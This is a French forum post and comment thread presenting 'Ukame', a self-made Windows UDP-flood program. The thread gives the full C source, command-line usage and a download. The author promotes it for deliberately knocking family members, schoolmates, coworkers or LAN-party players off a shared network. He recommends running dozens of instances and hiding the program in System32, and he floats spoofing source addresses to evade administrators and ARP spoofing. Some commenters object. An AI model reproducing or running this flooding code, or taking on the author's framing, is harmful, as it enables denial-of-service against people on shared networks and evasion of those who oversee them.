Version d'archive
Petit logiciel codé avec les pieds, il ne vous servira qu'à rien d'autre que surcharger votre débit internet, pouvant générer jusqu'à 500 Mb/s de trafic "Artficiel", soit pouvant ralentir la majorité des connexions, voir atomiser littéralement les "petites connexions" inférieures à 1 Mb/s...
Globalement, pas grand chose... C'est une technique dite d'UDP-Flood, soit de faire passer dans votre internet une grande quantité de paquets UDP inutiles pour en perturber le fonctionnement. Efficace en groupe contre une cible commune, UkamE est plutôt orienté du côté utilisateur, du fait de l'ampleur du nombre de paquets envoyés.
Imaginez votre connexion internet comme un petit tuyau, avec des informations du monde qui vont vers vous et d'autres que vous envoyez au monde. Le protocole standart, dit "TCP/IP", va d'abord envoyer une demande de connexion, puis attend le retour du serveur qui lui dit "Ok, vas-y, connexion acceptée", puis communique normalement. L'idée est ici de faire passer dans ce même petit tuyau des milliers de gros paquets inutiles en UDP , c'est à dire qu'on envoi directement (sans se connecter) des millions de paquets n'importe où (on vise des ports aléatoires, l'idée n'étant pas de saturer la cible, mais bien sa propre connexion), et tout ça très vite.
L'idée est que Ukame engorge votre connexion avec des milliers de paquets UDP, ainsi, lorsque vous allez réaliser une connexion standart de type TCP/IP (soit charger une page web, jouer en ligne... etc) ou même utiliser un transit de donnée quelconque (un ping ICMP vers l'internet, de la communication en UDP... etc), ils vont passer par ce même tuyau, mais devront attendre une petite place entre les milliers de paquets que vous envoyez en permanence. Ainsi, il y aura un temps de latence supplémentaire sur votre connexion , temps de latence, si il dépasse 5-6 secondes, équivaudra pour la plupart des logiciels pour une absence de réponse. En gros, plus le tuyau sera large, moins ils attendront et moins votre tentative d'engorgement marchera, et moins le tuyau sera large, plus ça fonctionnera bien.
Ukame, une fois démarré, tentera d'envoyer plus ou moins 1000 à 2000 paquets UDP de 512ko, soit un débit consommé théorique de 512Mo/s . C'est le point de vue théorique si Ukame disposait de toutes les ressources de l'ordinateur, une solution pour maximiser le temps processeur alloué à Ukame est de lançer une bonne vingtaine de fois le programme.
Bon, c'est codé avec les pieds et pas du tout optimisé, mais avec un seul ordinateur et 36 instances d'Ukame, le temps de latence ajouté à ma pauvre connexion à 500 Ko/s fut d'environ 50-55 secondes , ce qui est honorable.
Pour les effets directs, c'est un temps de latence indécent (oubliez les jeux en ligne et//ou multijoueurs de toute sorte), voire sur les connections inférieures à 500Ko/s à une coupure totale de l'internet chez vous (l'effet "Timeout", notre technologie d'aujourd'hui abandonne tous espoirs à 30 seconde de latence), et chez les gens dotés de Box qui font Internet-Téléphone-Télévision, ils peuvent s'attendre à une perturbation globale de ces services voire à une coupure totale du téléphone (Faits réels testés en vrai)?
Peu efficace pour faire des véritables attaques de cible, il reste néanmoins un outil très puissant pour une attaque de l'intérieur, surtout dans un réseau centralisé...
Votre aimé ne fait que jouer à des jeux en multi-joueur, vous voulez l'obliger à venir vous faire un câlin ?
Ukame est l'arme idéale, il engorgera de façon temporaire l'internet de votre maison, vous aurez main mise sur le temps de jeu de vos fils//fille//homme//femme et sur ses accès à l'internet, puisqu'en un tour de main vous pourrez nuker toutes leurs activités !
Envie de pourrir la vie à votre prochain ?
Bien sûr, Ukame mis en oeuvre sur des réseaux plus grands (et donc plus résistants) tels que votre lycée, votre boulot ou votre LAN-Party en cours, reste toujours possible et terriblement handicapant. (Bien que Ukame peut être insuffisant, ou même qu'on vous repère et vous sanctionne, bien qu'en théorie, c'est difficile)
Mais rappellez-vous, Ukame se met en oeuvre de l'intérieur, c'est annhiler sa propre connexion internet et emporter avec soi celle de son réseau !
L'auteur de ce logiciel, l'hébergeur de ce logiciel et le présent site sur lequel il est publié ne pourraient être tenus pour responsable des usages qu'en fera l'utilisateur et de leurs conséquences.
En cliquant sur le lien ci-dessous, en téléchargeant le présent logiciel, en obtenant une copie du présent logiciel ou en utilisant ce présent logiciel, vous déclarez prendre à votre charge et prendre responsabilité de toutes les conséquences liées à l'usage de ce logiciel par vous ou une personne tierce par votre intermédiaire.
Téléchargez Ukame Bêta - Vous acceptez les conditions ci-dessus :
Logiciel pour Windows
Décompressez le fichier que vous venez de télécharger dans un dossier quelconque, utilisez le "warh.bat" présent dans le même dossier que "ukame.exe" pour faire une utilisation directe d'Ukame. Il est conçu pour être lançé depuis une invite de commande, vous pouvez placer une copie d'Ukame dans votre System32 pour en banaliser l'utilisation sur votre ordinateur.
kasabian aime cet article
posté par Sbirematqui il y a plus de 11 ans , édité par Sbirematqui il y a plus de 11 ans
Mais la vraie question que tout geek se pose: POURQUOI CE PROGRAMME?
si quelqu'un est sur internet en même temps, on joue avec.
si on ne l'est pas alors qu'il l'est, on respecte son geekage.
ZUT.
Aka Guymelef il y a plus de 11 ans
L'une des utilités positives que j'y vois (bien que restreintes à peu de gens) est pour les développeurs qui veulent tester leur application utilisant le réseau dans des conditions dégradées. Mais c'est bien le seul cas auquel je peux penser.
Sbirematqui il y a plus de 11 ans
Il fut conçu en réaction à une tendance aux téléchargements vidéoludiques de façon diurne, de ce fait, la connexion restait difficilement utilisables pour les autres utilisateurs, puisque sur 500 Ko/s partagés, les téléchargements en mangaient 300-400...
Mais bon, maintenant, j'ai le Desktop Ukame , grâce à lui, il passe dans le réseau et nettoie de fond en comble en terminant plus ou moins toutes les connexions actives en moins d'une minute (et l'abandon des téléchargements). Au bout de 5 minutes, tout utilisateur normal se trouve une activité, et là, j'enlève le DesktopUkame qui laisse une tuyauterie bien propre et vide de paquets parasites.
si quelqu'un est sur internet en même temps, on joue avec.
si on ne l'est pas alors qu'il l'est, on respecte son geekage.
Quand j'y suis pas, je n'ai que faire de ce qu'il fait, que ce quelqu'un aille réaliser tous ses désirs, mais lorsque j'y suis, qu'il refuse de partager, bah, ça passe moins bien.
Alors je sors le Desktop.
Non, je ne suis pas cruel et égoïste, juste que télécharger des fichiers de 10 Go en permanence, ça ne se fait pas ! è_é
Et rendez-vous compte, en plus ils osent jouer à League Of Legend !
Ertaï il y a plus de 11 ans
A défaut de parvenir à un accord, on a recours à la force brute... je ne suis pas fier de toi Sbire
Sbirematqui il y a plus de 11 ans
J'en attendais pas moins de toi, monsieur conciliation, mais pour le coup, ça fonctionne très bien, puisque maintenant c'est des téléchargements noctures beaucoup moins gênant !
On peut aussi communiquer avec de l'UDP.
Ertaï il y a plus de 11 ans
Au fait, pourquoi ce nom ?
Dieu il y a plus de 11 ans
Tu dois vraiment te faire chier.
Ou alors tu as un genre de don pour poser des questions bizarres! :- D
Ertaï il y a plus de 11 ans
Je suis juste curieux, c'est tout. J'avais la question depuis le début mais j'ai oublié de la poser la première fois
Sbirematqui il y a plus de 11 ans
UDP - KAMEAMEAH - APOCALYPSE - MEGA - ENGINE
C'est un acronyme idiot.
SpiceGuid il y a plus de 11 ans
ça dépasse tout ce que j'avais imaginé dans mes cauchemars acronymesques les plus délirants.
MrSquid il y a plus de 11 ans
Tu as utilisé quel langage ? Y'a moyen de voir le code source ?
Sbirematqui il y a plus de 11 ans
Codé au burin en C, je peux filer le coder source à la condition stricte qu'on ne fasse pas de commentaires sur mes manières "porcs" de coder et ma non-portabilité vis à vis des GNU/Linuxiens.
Spoiler (Sélectionnez le texte dans le cadre pointillé pour le faire apparaître)
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <conio.h>
#include <windows.h>
#include <winsock2.h>
#define BUFFER 524228
WSADATA initialisation_win32;
int erreur;
int tempo;
int nombre_de_caractere;
int pork;
int on;
int size;
int count = 0;
char buffer[BUFFER];
SOCKET id_de_la_socket;
SOCKADDR_IN information_sur_la_destination;
int trand (int _iMin, int _iMax)
{
return (_iMin + (rand () % (_iMax-_iMin+1)));
}
int main (int argc, char* argv[])
{
printf("Mwhar ! ApooOOOOoocalyyypse !\n" ) ;
if(argc == 4)
{
printf("Target locked : %s\n", argv[1]);
printf("Holy shit : %s\n", argv[2]);
printf("Deamons : %s/%d\n", argv[3], atoi(argv[3]));
size = atoi(argv[3]);
} else {
printf("Non-Deamonic orders !\n" ) ;
exit(1);
}
erreur=WSAStartup(MAKEWORD(2,2),&initialisation_win32);
if (erreur!=0)
printf("\nWinsock Error : %d %d",erreur,WSAGetLastError());
else
printf("\nArmy of Deamons : Ready." ) ;
id_de_la_socket=socket(AF_INET,SOCK_DGRAM,0);
if (id_de_la_socket==INVALID_SOCKET)
printf("\nSock Error : %d",WSAGetLastError());
else
printf("\nGate of Darkness : Ready.\n" ) ;
information_sur_la_destination.sin_family=AF_INET;
strcpy(buffer,argv[2]);
buffer[strlen(buffer) - 1] = 'X';
buffer[strlen(buffer) * 1] = 'X';
buffer[strlen(buffer) + 1] = 'X';
buffer[BUFFER - 1] = '\0';
printf("Canon loaded, press F1 to launch Deamons ! (F2 to pause ; F3 to stop)\n" ) ;
while( !(GetKeyState(VK_F1) & 32768) )
{
Sleep(1);
}
printf("\nKA-ME-AH-" ) ;
on = 0;
while( 1 )
{
on++;
if(on==1000)
{
printf("." ) ;
}
if(on==2000)
{
printf("." ) ;
}
if(on==3000)
{
printf("." ) ;
}
if(on==4000)
{
break;
}
Sleep(1);
}
printf("\n" ) ;
on = 0;
while(1)
{
pork = trand(0,65535);
information_sur_la_destination.sin_addr.s_addr=inet_addr(argv[1]);
information_sur_la_destination.sin_port=htons(pork);
nombre_de_caractere=sendto(id_de_la_socket,buffer,strlen(buffer),0,(struct sockaddr*)&information_sur_la_destination,sizeof(information_sur_la_destination));
if (nombre_de_caractere==SOCKET_ERROR)
{
count++;
printf("\n-MEaaaa... *kof* *kof* *kof* EPIC FAIL ! [%d on %d] ( Why ? It's %d ) ", count, pork,WSAGetLastError());
}
else
{
printf("\n-MEAAAAAAA ! ( #%d~%d on %d )",count,((size * count)/2),pork);
count++;
}
if( GetKeyState(VK_F3) & 32768) { break; }
if( GetKeyState(VK_F2) & 32768)
{
on = 1;
}
while(on == 1 && !(GetKeyState(VK_F1) & 32768))
{
if( GetKeyState(VK_F3) & 32768) { break; }
Sleep(100);
}
on = 0;
}
erreur=closesocket(id_de_la_socket);
if (erreur!=0)
printf("\nMore Fails : %d %d",erreur,WSAGetLastError());
else
printf("\nDeamons killed succesfully !" ) ;
erreur=WSACleanup();
if (erreur!=0)
printf("\nWe can't stop Deamons ! ( Why ? It's %d %d )",erreur,WSAGetLastError());
else
printf("\nGood bye !\n" ) ;
}
Pensez à linker la ws2_32.lib, sinon il ne fonctionnera pas.
MrSquid il y a plus de 11 ans
Merci, c'est surtout pour une question de principe que je voulais voir le code et aussi parce que je fais aussi un peu de C et que ça me donne des exemples de codes source !
Zergy il y a plus de 11 ans
Sinon, si vpus êtes sous GNU/Linux, vous pouvez charger le module noyau « pktgen » (pour PacKeT GENerator) qui permet de faire la même chose.
Sbirematqui il y a plus de 11 ans
En fait, du moment que tu passe sous un GNU/Linux, tu peux rapidement avoir beaucoup plus d'utilitaires pour faire ce genre de choses... notamment de l'ARP spoofing, c'est à dire rompre la communication d'un ordinateur au réseau en s'attaquant à sa table ARP.
*Sbirematqui vient d'avoir une idée diabolique*
M'enfin bon, là on tombe dans le vraiment méchant, engorger son réseau à coup de paquets UDP, c'est très gentil et pas forcément dangereux, moins que de véritables attaques.
Aka Guymelef il y a plus de 11 ans
SpiceGuid il y a plus de 11 ans
Rien qu'à lire les conditions d'utilisation il est clair que tu es totalement irresponsable
Ertaï il y a plus de 11 ans
En même temps, te souviens-tu d'un seul moment sur AG où Sbire a fait preuve de responsabilité ?
Sbirematqui il y a plus de 11 ans
SpiceGuid, la chose n'est pas dangereuse, mais j'adore en rajouter dans les conditions d'utilisation.
Moi, totalement irresponsable ? Je nie !
SpiceGuid il y a plus de 11 ans
Et, si ça n'est pas trop indiscret, qu'est-ce que tu faisais avec tes mains pendant que tu codais avec tes pieds ?
Sbirematqui il y a plus de 11 ans
Ukame prend en paramètre trois choses :
ukame.exe [Adresse IP de la cible] [Message à écrire au début du buffer] [Nombre d'instances]
On envoi donc nos paquets à une cible bien réelle, mais ne perdons pas de vue que l'on veut saturer le réseau et non s'attaquer à une cible... L'idée est donc de jouer astucieusement en choisissant une cible (très) solide habituée aux vagues de paquets, c'est pour cela qu'il est conseillé de prendre l'adresse IP de google.com (je l'ai incluse dans le batch), ainsi on envoi nos paquets sur les serveurs google qui sont tout à fait inoxydables.
Pour le traçage des paquets, il faut que je bricole un peu, mais sans doute il est possible de masquer nos paquets UDP en requêtes banalisés envers Google.com, voire même de forger des paquets originaux avec une adresse source... aléatoire. Après, ce genre de traçage s'applique surtout aux réseaux d'entreprises avec administrateurs aguerris capables de sniffer leur propre réseau, vous pouvez l'utiliser en toute sécurité chez vous.
Ertaï il y a plus de 11 ans , modifié il y a plus de 11 ans
"C'était encore un produit inutile de chez Sbire Corp, merci d'avoir suivi !"
---
Ukame envoie des paquets, fort bien, mais à qui ? Et puis les paquets sont forcément signés avec l'adresse IP d'expédition, donc ça rend le repérage simple, non ?
© Copyright 2002-2024 Aeriesguard.com - Mentions légales
Aerie's Guard V 7.0 réalisé par Ertaï, designé par Ivaldir, illustré par Izual et Sophie Masure
Luminox il y a plus de 11 ans